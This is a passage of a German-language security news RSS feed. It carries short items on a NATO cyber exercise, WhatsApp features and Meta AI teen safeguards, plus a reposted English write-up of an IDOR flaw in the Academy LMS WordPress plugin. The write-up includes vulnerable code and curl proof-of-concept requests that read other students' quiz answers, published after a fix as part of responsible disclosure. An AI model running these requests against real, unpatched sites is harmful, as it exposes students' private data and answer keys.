Es ist eine der weltweit größten Live-Fire-Übungen im Cyberbereich. Mehr als 40 Nationen trainieren mit Tausenden Teilnehmenden auf der NATO-Cyber-Range in Tallinn.<br />
<br />
Geübt wird ein fiktives Angriffsszenario auf ein Land. Red Teams führen Angriffe in Echtzeit durch, Blue Teams müssen sie abwehren. Unterstützt werden sie unter anderem von Legal-, StratCom- und weiteren Expertenteams.<br />
<br />
Mehrere Angriffe laufen parallel und verstärken sich im Szenario gegenseitig. Die Verteidiger müssen gleichzeitig technisch reagieren, kommunizieren und international zusammenarbeiten.<br/></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Stärkere Integration ins Gemini-Ökosystem: Googles NotebookLM wird zu Gemi­ni Notebook]]></title>
<description><![CDATA[Google benennt NotebookLM in Gemini Notebook um und integriert die KI-Plattform künftig deutlich enger in die Gemini-App und damit in das eigene Ökosystem. Parallel dazu erweitert das Unternehmen den Funktionsumfang. So soll unter anderem jedes Notizbuch schrittweise einen eigenen sicheren Cloud-...]]></description>
<link>https://tsecurity.de/de/3675542/it-nachrichten/staerkere-integration-ins-gemini-oekosystem-googles-notebooklm-wird-zu-gemini-notebook/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3675542/it-nachrichten/staerkere-integration-ins-gemini-oekosystem-googles-notebooklm-wird-zu-gemini-notebook/</guid>
<pubDate>Fri, 17 Jul 2026 11:03:20 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<img src="https://pics.computerbase.de/1/2/3/8/2/5-d176f17d154d9c7e/article-640x360.bb8e3dae.jpg"><p>Google benennt NotebookLM in Gemini Notebook um und integriert die KI-Plattform künftig deutlich enger in die Gemini-App und damit in das eigene Ökosystem. Parallel dazu erweitert das Unternehmen den Funktionsumfang. So soll unter anderem jedes Notizbuch schrittweise einen eigenen sicheren Cloud-Computer erhalten.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[WhatsApp-Schriftart ändern: So einfach passt ihr das Text-Design an]]></title>
<description><![CDATA[Wenn euch das normale Text-Design in WhatsApp zu langweilig wird, gibt es einige Wege, die Schriftart und -größe in euren Chats anzupassen. Wir zeigen euch, welche Möglichkeiten ihr direkt in der App habt und welche zusätzlichen Tricks es gibt.]]></description>
<link>https://tsecurity.de/de/3675469/it-nachrichten/whatsapp-schriftart-aendern-so-einfach-passt-ihr-das-text-design-an/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3675469/it-nachrichten/whatsapp-schriftart-aendern-so-einfach-passt-ihr-das-text-design-an/</guid>
<pubDate>Fri, 17 Jul 2026 10:32:32 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Wenn euch das normale Text-Design in WhatsApp zu langweilig wird, gibt es einige Wege, die Schriftart und -größe in euren Chats anzupassen. Wir zeigen euch, welche Möglichkeiten ihr direkt in der App habt und welche zusätzlichen Tricks es gibt.]]></content:encoded>
</item>
<item>
<title><![CDATA[Whatsapp-Nutzernamen lassen sich jetzt verwenden – Revolution beim Datenschutz]]></title>
<description><![CDATA[Whatsapp hat offensichtlich damit begonnen, erste Nutzernamen für die Benutzung freizuschalten. Betroffene Whatsapp-Nutzer sehen im Messenger einen entsprechenden Hinweis.



Das berichtet WABetainfo, ein Portal, das auf das Aufspüren neuer Funktionen in Whatsapp spezialisiert ist. Whatsapp hatte...]]></description>
<link>https://tsecurity.de/de/3675399/it-nachrichten/whatsapp-nutzernamen-lassen-sich-jetzt-verwenden-revolution-beim-datenschutz/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3675399/it-nachrichten/whatsapp-nutzernamen-lassen-sich-jetzt-verwenden-revolution-beim-datenschutz/</guid>
<pubDate>Fri, 17 Jul 2026 09:47:39 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>Whatsapp hat offensichtlich damit begonnen, erste Nutzernamen für die Benutzung freizuschalten. Betroffene Whatsapp-Nutzer sehen im Messenger einen entsprechenden Hinweis.</p>



<p>Das <a href="https://wabetainfo.com/whatsapp-is-gradually-rolling-out-the-full-username-feature/">berichtet</a> WABetainfo, ein Portal, das auf das Aufspüren neuer Funktionen in Whatsapp spezialisiert ist. <a href="https://www.pcwelt.de/article/3179958/deutsche-whatsapp-nutzer-koennen-sich-ab-sofort-ihren-benutzernamen-sichern.html" target="_blank" rel="noreferrer noopener">Whatsapp hatte vor einigen Wochen das Anlegen von Nutzernamen für alle Nutzer freigeschaltet. </a>Doch bisher ließen sich diese Nutzernamen nur reservieren, nicht aber verwenden. Das hat sich nun offensichtlich geändert.</p>



<p>Demnach können die ersten Whatsapp-Nutzer mit anderen Whatsapp-Nutzern über ihre neuen Benutzernamen kommunizieren. Die Telefonnummer muss damit anders als bisher nicht mehr angezeigt werden. Das sollte den Datenschutz innerhalb von Whatsapp deutlich verbessern. Wabetainfo schreibt:</p>



<blockquote class="wp-block-quote is-layout-flow wp-block-quote-is-layout-flow">
<p>Konkret kann nun eine sehr begrenzte Anzahl von Nutzern ihren reservierten Nutzernamen verwenden, um mit neuen Personen und Unternehmen zu kommunizieren. Dies ist zwar noch keine weltweite Einführung, verspricht jedoch bereits jetzt, die Art und Weise zu verändern, wie Nutzer ihre Kontaktdaten auf WhatsApp weitergeben.</p>
</blockquote>



<p>Der folgende Screenshot zeigt, wie die Benachrichtigung über den freigeschalteten Nutzernamen aussehen soll:</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a59ddea7619f"}' data-wp-interactive="core/image" class="wp-block-image size-large wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2026/07/WANutzernamenready.jpg?quality=50&amp;strip=all&amp;w=1200" alt="Whatsapp schaltet Nutzernamen frei" class="wp-image-3193448" width="1200" height="675" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button><figcaption class="wp-element-caption"><p>Whatsapp schaltet Nutzernamen frei</p>
</figcaption></figure><p class="imageCredit">WABetainfo</p></div>



<p>Sobald Ihr reservierter Benutzername bereitsteht, zeigt Whatsapp oben in der Chat-Liste einen neuen Banner an. Das Banner informiert Sie darüber, dass Ihr Benutzername aktiv ist, und erklärt, dass Sie ihn jetzt an andere weitergeben können. Derzeit kann allerdings nur eine begrenzte Anzahl von Nutzern ihren Benutzernamen verwenden. </p>



<h2 class="wp-block-heading">So prüfen Sie den aktuellen Status Ihres Nutzernamens</h2>



<p>Öffnen Sie die Einstellungen von Whatsapp und tippen Sie oben auf dem Bildschirm auf Ihren Profilbereich. Hier sehen Sie den Benutzernamen, den Sie bei der Registrierung ausgewählt haben, und ob er bereits aktiv ist. Auf demselben Bildschirm können Sie Ihren Benutzernamen jederzeit ändern oder löschen. </p>



<p>Wenn Sie den Benutzernamen wieder löschen, zeigt WhatsApp in Ihren bestehenden Chats Ihre Telefonnummer an. Dies gilt nicht, wenn Sie Ihren Benutzernamen lediglich ändern.</p>

</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[WhatsApp plant eigenen Cloud-Speicher für iPhone-Nutzer]]></title>
<description><![CDATA[WhatsApp arbeitet seit geraumer Zeit an einer eigenen Backup-Lösung, die jetzt auch zu iOS kommen soll. Nutzer sollen Chats, Fotos und Videos künftig direkt beim Messenger sichern können – zunächst mit 2 Gigabyte Gratis-Speicher.]]></description>
<link>https://tsecurity.de/de/3675366/it-nachrichten/whatsapp-plant-eigenen-cloud-speicher-fuer-iphone-nutzer/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3675366/it-nachrichten/whatsapp-plant-eigenen-cloud-speicher-fuer-iphone-nutzer/</guid>
<pubDate>Fri, 17 Jul 2026 09:33:30 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[WhatsApp arbeitet seit geraumer Zeit an einer eigenen Backup-Lösung, die jetzt auch zu iOS kommen soll. Nutzer sollen Chats, Fotos und Videos künftig direkt beim Messenger sichern können – zunächst mit 2 Gigabyte Gratis-Speicher.]]></content:encoded>
</item>
<item>
<title><![CDATA[How I Found a Cross-Student IDOR in Academy LMS That Leaked Correct Quiz Answers]]></title>
<description><![CDATA[Author: Shikhali Jamalzade GitHub: alisalive LinkedIn: camalzads Type: Independent Security Research | WordPress Plugin CVE ResearchThis is a write-up of a vulnerability I independently discovered in Academy LMS, a WordPress LMS plugin with 2,000+ active installations. The vulnerability allowed a...]]></description>
<link>https://tsecurity.de/de/3675346/hacking/how-i-found-a-cross-student-idor-in-academy-lms-that-leaked-correct-quiz-answers/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3675346/hacking/how-i-found-a-cross-student-idor-in-academy-lms-that-leaked-correct-quiz-answers/</guid>
<pubDate>Fri, 17 Jul 2026 09:23:36 +0200</pubDate>
<category>🕵️ Hacking</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*yTFnySBjd6cxjcwiw7Mxpg.png"></figure><h4>Author: <a href="https://medium.com/u/20557ba7487d">Shikhali Jamalzade</a> <br>GitHub: <a href="http://github.com/alisalive">alisalive</a> <br>LinkedIn: <a href="http://linkedin.com/in/camalzads">camalzads</a> <br>Type: Independent Security Research | WordPress Plugin CVE Research</h4><p>This is a write-up of a vulnerability I independently discovered in Academy LMS, a WordPress LMS plugin with 2,000+ active installations. The vulnerability allowed any enrolled student to read another student’s private quiz results and extract the correct answers to quiz questions — before or during an attempt. It was independently confirmed by another researcher, has since been patched, and this write-up is being published after the fix was released.</p><p>Background: Why Academy LMS</p><p>My WordPress plugin research methodology targets plugins in the 500–9,000 active installations range — a zone that tends to receive less security scrutiny than larger plugins while still having enough real-world deployment to matter. For each candidate, I start with passive analysis: reading the changelog for security-related keywords, reviewing the readme, and checking WPScan’s vulnerability history before touching any code.</p><p>Academy LMS caught my attention because its 3.8.1 changelog contained a specific entry: “Fixed — AJAX API vulnerability in the Notes feature.” This is one of the strongest signals I look for. A developer who has already fixed a security issue in one part of a codebase often used the same patterns elsewhere — and those other places sometimes didn’t get fixed at the same time. My hypothesis was simple: if the Notes controller was fixed, what about the Quiz controller?</p><p>This turned out to be exactly the right question.</p><p>Understanding the Architecture</p><p>Academy LMS uses two parallel systems for handling API requests.</p><p>The first is a centralized AJAX handler defined in includes/classes/abstract-ajax-handler.php. Every AJAX action registered through this base class passes through handle_ajax_request(), which enforces nonce validation and capability checks before dispatching to the actual callback. This is a solid design pattern.</p><p>The second system is a collection of REST controllers under includes/api/ and addons/quizzes/api/. Each controller registers its own routes via register_rest_route() and defines its own permission_callback per endpoint. This is where consistency breaks down.</p><p>When I grepped for permission_callback across the entire plugin, the Notes controller showed the correct pattern: every route used array($this, 'permissions_check'), and that function derived the user via get_current_user_id(), never accepting a user identifier from the request. The Notes fix had made this air-tight.</p><p>The Quiz attempts controller told a different story.</p><p>Two routes in addons/quizzes/api/quiz-questions.php used 'permission_callback' =&gt; '__return_true' — meaning no authentication required at all for those endpoints. That was worth noting. But the more serious issue was in addons/quizzes/api/quiz-attempts.php, specifically in the get_student_quiz_attempt_details endpoint.</p><p>The Vulnerability: Two Separate Failure Points</p><p>The get_student_quiz_attempt_details handler had two independent authorization failures that together created a working IDOR.</p><p>Failure point one: the target user was read from the request, not the session.</p><pre>// addons/quizzes/api/quiz-attempts.php, line ~305<br>$student_id = $request-&gt;get_param( 'user_id' );<br>if ( ! $student_id ) {<br>    $student_id = get_current_user_id();<br>}</pre><p>The handler falls back to the session user only if user_id is absent from the request. Any caller who supplies a user_id parameter gets that value used as the target identity. This is the classic IDOR setup: the object being accessed is determined by a client-controlled key.</p><p>Failure point two: the access gate was evaluated against the victim’s context, not the caller’s.</p><pre>// lines ~308-315<br>$is_administrator = current_user_can( 'administrator' );<br>$is_instructor    = \Academy\Helper::is_instructor_of_this_course( $student_id, $course_id );<br>$enrolled         = \Academy\Helper::is_enrolled( $course_id, $student_id );<br>$is_public        = \Academy\Helper::is_public_course( $course_id );</pre><pre>if ( $is_administrator || $is_instructor || $enrolled || $is_public ) {<br>    // returns attempt details<br>}</pre><p>Notice that is_instructor_of_this_course and is_enrolled both receive $student_id — the attacker-controlled value — not get_current_user_id(). So when an attacker supplies a victim's user_id, the gate asks "is the victim enrolled in this course?" rather than "is the caller enrolled in this course?" If the victim is enrolled (which they must be to have a quiz attempt), the gate returns true, and the handler proceeds to fetch and return that victim's data.</p><p>The database query confirmed the full impact:</p><pre>// classes/query.php, get_quiz_attempt_details()<br>"SELECT<br>    attempt_answers.attempt_id,<br>    attempt_answers.user_id,<br>    attempt_answers.is_correct,<br>    attempt_answers.answer as given_answer,<br>    quiz_answers.answer_title as correct_answer,<br>    quiz_answers.answer_content,<br>    quiz_answers.is_correct as is_correct_answer,<br>    quiz_questions.question_title,<br>    quiz_questions.question_type,<br>    ...<br>FROM {$wpdb-&gt;prefix}academy_quiz_attempt_answers as attempt_answers<br>LEFT JOIN {$wpdb-&gt;prefix}academy_quiz_answers as quiz_answers<br>    ON attempt_answers.question_id = quiz_answers.question_id<br>WHERE attempt_answers.attempt_id=%d AND attempt_answers.user_id=%d"</pre><p>The SELECT *-style join pulled answer_title and answer_content from the quiz_answers table — rows that include is_correct=1 entries, meaning the correct answers. The response handed the full set to the caller: every question the victim answered, whether they got it right, and what the correct answer was.</p><p>The same vulnerable function was exposed through two independent entry points. The REST route at /wp-json/academy/v1/quiz_attempts/{id}/get_student_quiz_attempt_details used this logic directly. The AJAX action academy_quizzes/get_student_quiz_attempt_details via /wp-admin/admin-ajax.php used an identical copy of the same handler in addons/quizzes/ajax/frontend.php.</p><p>Both were confirmed exploitable during testing.</p><p>The Contrast with the Fixed Code</p><p>What made this particularly clear-cut was the comparison with the Notes controller. The fix that had been shipped for Notes followed a textbook pattern:</p><pre>// includes/api/notes.php (fixed)<br>public function get_user_notes( $request ) {<br>    $user_id = get_current_user_id();<br>    // ...<br>}</pre><p>No $request-&gt;get_param('user_id'). The user identity is always taken from the authenticated session. The Quiz handler simply never received the same treatment.</p><p>This is a pattern I have seen repeatedly in plugin codebases: a developer identifies and fixes a class of vulnerability in one module, but the fix is not propagated to sibling modules that share the same pattern. The developer who wrote the Notes fix clearly understood the right approach. The Quiz addon was not updated to match.</p><p>Live Proof of Concept</p><p>I reproduced this against a local Docker environment running WordPress with Academy LMS 3.8.2 and the Quizzes addon enabled.</p><p>Actors in the test:</p><ul><li>Attacker: pocsubscriber (user ID 4, Subscriber role), enrolled in a shared course</li><li>Victim: victimstudent (user ID 5, Subscriber role), enrolled in the same course, with a completed quiz attempt containing a seeded correct-answer marker</li></ul><p>The attacker authenticates normally and obtains a valid REST nonce:</p><pre>curl -s -c cj.txt "http://TARGET/wp-login.php" -o /dev/null<br>curl -s -b cj.txt -c cj.txt \<br>  --data-urlencode 'log=pocsubscriber' \<br>  --data-urlencode 'pwd=PASSWORD' \<br>  --data-urlencode 'wp-submit=Log In' \<br>  --data-urlencode 'testcookie=1' \<br>  "http://TARGET/wp-login.php" -o /dev/null</pre><pre>NONCE=$(curl -s -b cj.txt \<br>  "http://TARGET/wp-admin/admin-ajax.php?action=rest-nonce")</pre><p>The attacker then sends a request supplying the victim’s user_id and attempt_id:</p><pre>curl -s -b cj.txt -H "X-WP-Nonce: $NONCE" \<br>  "http://TARGET/wp-json/academy/v1/quiz_attempts/3/get_student_quiz_attempt_details?course_id=32&amp;user_id=5"</pre><p>The response:</p><pre>{<br>  "3": {<br>    "attempt_id": "3",<br>    "user_id": "5",<br>    "is_correct": true,<br>    "given_answer": [],<br>    "correct_answer": [<br>      {<br>        "answer_id": "2",<br>        "quiz_id": "33",<br>        "answer_title": "SECRET_CORRECT_Paris",<br>        "answer_order": "1"<br>      }<br>    ],<br>    "answer_content": "CORRECT_ANSWER_CONTENT",<br>    "question_title": "Capital of France?",<br>    "question_type": "true_false"<br>  }<br>}</pre><p>User ID 4 received user ID 5’s quiz data, including the seeded correct-answer marker SECRET_CORRECT_Paris. The same result was reproduced via the AJAX vector:</p><pre>curl -s -b cj.txt \<br>  --data-urlencode 'action=academy_quizzes/get_student_quiz_attempt_details' \<br>  --data-urlencode 'security=ACADEMY_NONCE' \<br>  --data-urlencode 'course_id=32' \<br>  --data-urlencode 'attempt_id=3' \<br>  --data-urlencode 'user_id=5' \<br>  "http://TARGET/wp-admin/admin-ajax.php"</pre><p>Response: "success": true, same data.</p><p>Impact Assessment</p><p>The impact has two distinct dimensions.</p><p>The first is a straightforward confidentiality breach. Any enrolled student could enumerate other students’ quiz attempts by iterating over sequential attempt_id and user_id integers — both auto-increment, both trivially guessable. For every attempt they could retrieve the submitted answers, whether each answer was correct, and the final score. In an educational context, this is a meaningful privacy violation: a student's quiz performance is personal data.</p><p>The second dimension is academic integrity. The correct_answer field in the response exposes the correct answers to every quiz question, regardless of whether the requester has even started the quiz. A student could query this endpoint before beginning an attempt, extract the answer key, and complete the quiz with full knowledge of all correct answers. Every graded assessment built on the Academy LMS Quizzes addon was affected.</p><p>The required access level was Subscriber — the lowest authenticated role in WordPress. Any user who could create an account and enroll in a course could exploit this. In the free edition, is_public_course() always returns false due to an unregistered hook, so the practical attack surface was authenticated cross-student access within any shared course. This is the normal LMS use case: multiple students in the same course.</p><p>CVSS 3.1 score: 6.5 (AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:N).</p><p>Disclosure Timeline</p><p>Discovery and full proof-of-concept (both vectors confirmed): 2026–07–02</p><p>Vendor notified via email to contact@kodezen.com with full technical description, affected code locations, and suggested remediation: 2026–07–02</p><p>Submitted to WPScan vulnerability database with CVE request: 2026–07–02</p><p>WPScan confirmed the vulnerability was already being tracked (independent discovery, duplicate submission): 2026–07–02</p><p>Fix confirmed in latest version by code review (all $request-&gt;get_param('user_id') references replaced with get_current_user_id() throughout quiz-attempts.php): 2026-07-10</p><p>Write-up published: 2026–07–10</p><p>The Fix</p><p>The vendor addressed the vulnerability by replacing all attacker-controlled user identity references with session-derived values. In the current version of addons/quizzes/api/quiz-attempts.php:</p><pre>// Before (vulnerable):<br>$student_id = $request-&gt;get_param( 'user_id' );<br>if ( ! $student_id ) {<br>    $student_id = get_current_user_id();<br>}</pre><pre>// After (fixed):<br>$current_user_id = get_current_user_id();</pre><p>The access gate now evaluates is_enrolled and is_instructor_of_this_course against the authenticated caller, not a request-supplied identity. The fix was applied consistently across both the REST and AJAX entry points. If you are running Academy LMS with the Quizzes addon, update to the latest version.</p><p>What This Teaches</p><p>A few things stood out during this research that are worth naming explicitly.</p><p>The inconsistent-fix pattern is real and worth hunting deliberately. When a plugin ships a security fix in one module, the most productive next step is to find every module that uses the same pattern and check whether it was updated. In this case, the Notes controller and the Quiz controller shared the same conceptual flaw. The fix applied to Notes in 3.8.1 was not carried through to the Quiz addon. This is not negligence — it is a natural consequence of how security fixes get written. A developer identifies a specific bug, fixes that specific bug, and moves on. The audit that would catch the sibling issue requires a broader view.</p><p>The access gate placement matters as much as the access gate logic. The permission_callback on the REST route only checked whether the caller was logged in and associated with the course in a general sense. It did not check whether the object being requested (the specific attempt) belonged to the caller. Object-level authorization — checking not just “can this user access this resource type” but “can this user access this specific resource instance” — needs to happen at the data retrieval layer, not just at the route entry point. This is the core of what OWASP calls Broken Object-Level Authorization (BOLA), the top item in the OWASP API Security Top 10.</p><p>Sequential integer identifiers make IDOR exploitable at scale. When attempt_id and user_id are both auto-increment database integers, an attacker does not need to know specific values to enumerate the data. They iterate. Opaque identifiers (UUIDs, non-sequential tokens) raise the bar, but they are not a substitute for proper authorization — they only make enumeration harder, not impossible if an attacker has access to any valid identifier. The fix here was correct: enforce ownership at the query layer regardless of identifier type.</p><p><em>If you found this useful, feel free to connect on</em> <a href="https://linkedin.com/in/camalzads"><em>LinkedIn</em></a> <em>or check out my projects on</em> <a href="http://github.com/alisalive"><em>GitHub</em></a><em>.</em></p><img src="https://medium.com/_/stat?event=post.clientViewed&amp;referrerSource=full_rss&amp;postId=c68bfe06f3a0" width="1" height="1" alt=""><hr><p><a href="https://infosecwriteups.com/how-i-found-a-cross-student-idor-in-academy-lms-that-leaked-correct-quiz-answers-c68bfe06f3a0">How I Found a Cross-Student IDOR in Academy LMS That Leaked Correct Quiz Answers</a> was originally published in <a href="https://infosecwriteups.com/">InfoSec Write-ups</a> on Medium, where people are continuing the conversation by highlighting and responding to this story.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Freitag: KI-Meldungen bei Teenager-Gefahren, Beifall für Samsungs Bugfixing]]></title>
<description><![CDATA[Elternalarm nach bedrohlichen KI-Chats + Experten-Lob für Samsung + OpenAI keine EU-Marke + Meilenstein für weltgrößtes Windrad + Ende der Brenner-Fahrverbote]]></description>
<link>https://tsecurity.de/de/3675043/it-nachrichten/freitag-ki-meldungen-bei-teenager-gefahren-beifall-fuer-samsungs-bugfixing/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3675043/it-nachrichten/freitag-ki-meldungen-bei-teenager-gefahren-beifall-fuer-samsungs-bugfixing/</guid>
<pubDate>Fri, 17 Jul 2026 06:32:58 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Elternalarm nach bedrohlichen KI-Chats + Experten-Lob für Samsung + OpenAI keine EU-Marke + Meilenstein für weltgrößtes Windrad + Ende der Brenner-Fahrverbote]]></content:encoded>
</item>
<item>
<title><![CDATA[Die Jagd nach dem ersten König des Darknets]]></title>
<description><![CDATA[Author: Simplicissimus - Bewertung: 4738x - Views:48100 Mit Shopify kannst du deinen eigenen Shop im Handumdrehen aufsetzen und das Design individuell an deine Marke anpassen. Sidekick hilft dir, dein Business effizient zu verwalten. Teste Shopify kostenlos unter https://shopify.de/simpli (Werbun...]]></description>
<link>https://tsecurity.de/de/3674538/it-security-nachrichten/die-jagd-nach-dem-ersten-koenig-des-darknets/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3674538/it-security-nachrichten/die-jagd-nach-dem-ersten-koenig-des-darknets/</guid>
<pubDate>Thu, 16 Jul 2026 21:52:23 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Author: Simplicissimus - Bewertung: 4738x - Views:48100 <br/></p><p><iframe id="ytplayer" loading="lazy" type="text/html" width="100%" height="auto" src="https://www.youtube.com/embed/YTkBmxfcFfg?autoplay=1&origin=http://tsecurity.de" frameborder="0"></iframe></p><p>Mit Shopify kannst du deinen eigenen Shop im Handumdrehen aufsetzen und das Design individuell an deine Marke anpassen. Sidekick hilft dir, dein Business effizient zu verwalten. Teste Shopify kostenlos unter https://shopify.de/simpli (Werbung)<br />
<br />
Die Jagd auf den „Dread Pirate Roberts“, tausende gestohlene Bitcoin und ein Sündenbock, der fast die ganze Schuld getragen hätte. Das ist die Geschichte der Ermittler hinter dem Silk Road-Fall.<br />
<br />
Ein besonderer Dank geht an Nick Bilton und sein Buch „American Kingpin: The Epic Hunt for the Criminal Mastermind Behind the Silk Road“.<br />
<br />
<br />
Checkt Unfassbar ab: @unfassbar<br />
https://www.youtube.com/@UC9h7UoNb95t_b5A4eHmRnFw <br />
<br />
Spotify: https://spoti.fi/3Y1qYKJ<br />
Apple Podcasts: https://apple.co/4eToIMA<br />
Amazon Music: https://amzn.to/3Y7TEll<br />
RSS-Feed: https://anchor.fm/s/fc0e8c18/podcast/rss<br />
<br />
------<br />
<br />
Danke an unsere Patrons:   / simplicissimus  <br />
https://www.patreon.com/simplicissimus<br />
<br />
Simpli auf Instagram:   / simplicissimusyt  <br />
https://www.instagram.com/simplicissimusyt<br />
<br />
Simpli auf TikTok:   / simplicissimus<br />
https://www.tiktok.com/@simplicissimus<br />
<br />
<br />
Quellen:<br />
https://docs.google.com/document/d/1fPiySfmprfR4YyKA3gaNakYRC2m_v8S_Z8MgnJcRSYo/edit?tab=t.0<br />
<br />
<br />
Musik:<br />
Epidemic Sound:<br />
Behind the Shadow - Ruiqi Zhao<br />
Kansas - Christian Andersen<br />
Long Way Home - Aiyo<br />
Temporarily Virtual - Cobby Costa<br />
Voigt-Kampff - Martin Baekkevold<br />
Beacons - Cobby Costa<br />
The Sky Is Closing In - Cobby Costa<br />
Detour Switch - Cobby Costa<br />
Red Alert - Lennon Hutton<br />
Strange Interference - Cobby Costa<br />
The Shadow - Christoffer Moe Ditlevsen<br />
Impasse - Silver Maple<br />
Now That's an Alarm! - Harry Edvino<br />
Riot in the Capital - Bonnie Grace<br />
The Mutants - Farrell Wooten<br />
Knee Deep - Blue Saga<br />
Suspiral - Anthony Earls<br />
Ghostly - Tigerblood Jewel<br />
Parallel Existence - Raymond Grouse<br />
Tracker - Christoffer Moe Ditlevsen<br />
Slow Discovery - Cobby Costa<br />
<br />
Artlist:<br />
Oliver Michael - Witness - Extended version<br />
Sebastian Borromeo - See Through the Crack<br />
Morphlexis - Submarine<br />
IamDayLight - Hypnotize<br />
Artlist Musical Logos - Tensive Logo 1<br />
Or Chausha - Are You Still Alive - No Strings<br />
Ian Post - Mayhem<br />
Isaac DaBom - Keep Your Eyes Open<br />
Risian - Mission Critical<br />
Or Chausha - No Decides<br />
Stanley Gurvich - Transmission<br />
Oran Alaloof - Dark Apoko<br />
<br />
Lens Distortions:<br />
Riptide - No Pulse<br />
Tempered<br />
Why Be Normal - No High Percussion<br />
Force Multiplier - No High Percussion<br />
<br />
<br />
<br />
_____<br />
<br />
Schön, verständlich, kritisch und fundiert. Wir machen Essays zu Fragen, die du dir noch nie, oder viel zu oft gestellt hast.<br/></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Selbstverletzung, Suizid: Meta meldet riskante KI-Chats den Eltern]]></title>
<description><![CDATA[Reden Teenager auf Instagram mit der Meta AI zu oft über Suizid oder Selbstverletzung, sollen bald die Eltern alarmiert werden. Wenn die mitmachen.]]></description>
<link>https://tsecurity.de/de/3674535/it-nachrichten/selbstverletzung-suizid-meta-meldet-riskante-ki-chats-den-eltern/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3674535/it-nachrichten/selbstverletzung-suizid-meta-meldet-riskante-ki-chats-den-eltern/</guid>
<pubDate>Thu, 16 Jul 2026 21:47:25 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Reden Teenager auf Instagram mit der Meta AI zu oft über Suizid oder Selbstverletzung, sollen bald die Eltern alarmiert werden. Wenn die mitmachen.]]></content:encoded>
</item>
<item>
<title><![CDATA[Meta AI: Neue Schutzfunktionen für Jugendliche bei sensiblen Chats angekündigt]]></title>
<description><![CDATA[Meta führt neue Sicherheitswerkzeuge ein, um Jugendliche im Umgang mit dem hauseigenen KI-Assistenten Meta AI besser zu schützen. Der Fokus liegt dabei auf dem sensiblen Umgang mit Themen wie Suizid und Selbstverletzung. Die wichtigste Neuerung betrifft die Elternbenachrichtigungen. Wenn ein...Zu...]]></description>
<link>https://tsecurity.de/de/3674444/it-nachrichten/meta-ai-neue-schutzfunktionen-fuer-jugendliche-bei-sensiblen-chats-angekuendigt/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3674444/it-nachrichten/meta-ai-neue-schutzfunktionen-fuer-jugendliche-bei-sensiblen-chats-angekuendigt/</guid>
<pubDate>Thu, 16 Jul 2026 21:01:33 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Meta führt neue Sicherheitswerkzeuge ein, um Jugendliche im Umgang mit dem hauseigenen KI-Assistenten Meta AI besser zu schützen. Der Fokus liegt dabei auf dem sensiblen Umgang mit Themen wie Suizid und Selbstverletzung. Die wichtigste Neuerung betrifft die Elternbenachrichtigungen. Wenn ein...<p>Zum Beitrag: <a href="https://stadt-bremerhaven.de/meta-ai-neue-schutzfunktionen-fuer-jugendliche-bei-sensiblen-chats-angekuendigt/">Meta AI: Neue Schutzfunktionen für Jugendliche bei sensiblen Chats angekündigt</a>
</p><p>
Wo du uns folgen kannst:
<a href="http://www.facebook.com/CaschysBlog">Facebook</a>, <a href="https://www.reddit.com/r/CaschysBlog/">Reddit</a>, <a href="https://news.google.com/publications/CAAqMQgKIitDQklTR2dnTWFoWUtGSE4wWVdSMExXSnlaVzFsY21oaGRtVnVMbVJsS0FBUAE?ceid=DE:de&amp;oc=3">Google News</a>, <a href="https://x.com/CaschysBlog">X</a>, <a href="https://www.threads.com/@caschysblog">Threads</a>
<br>
</p><div>
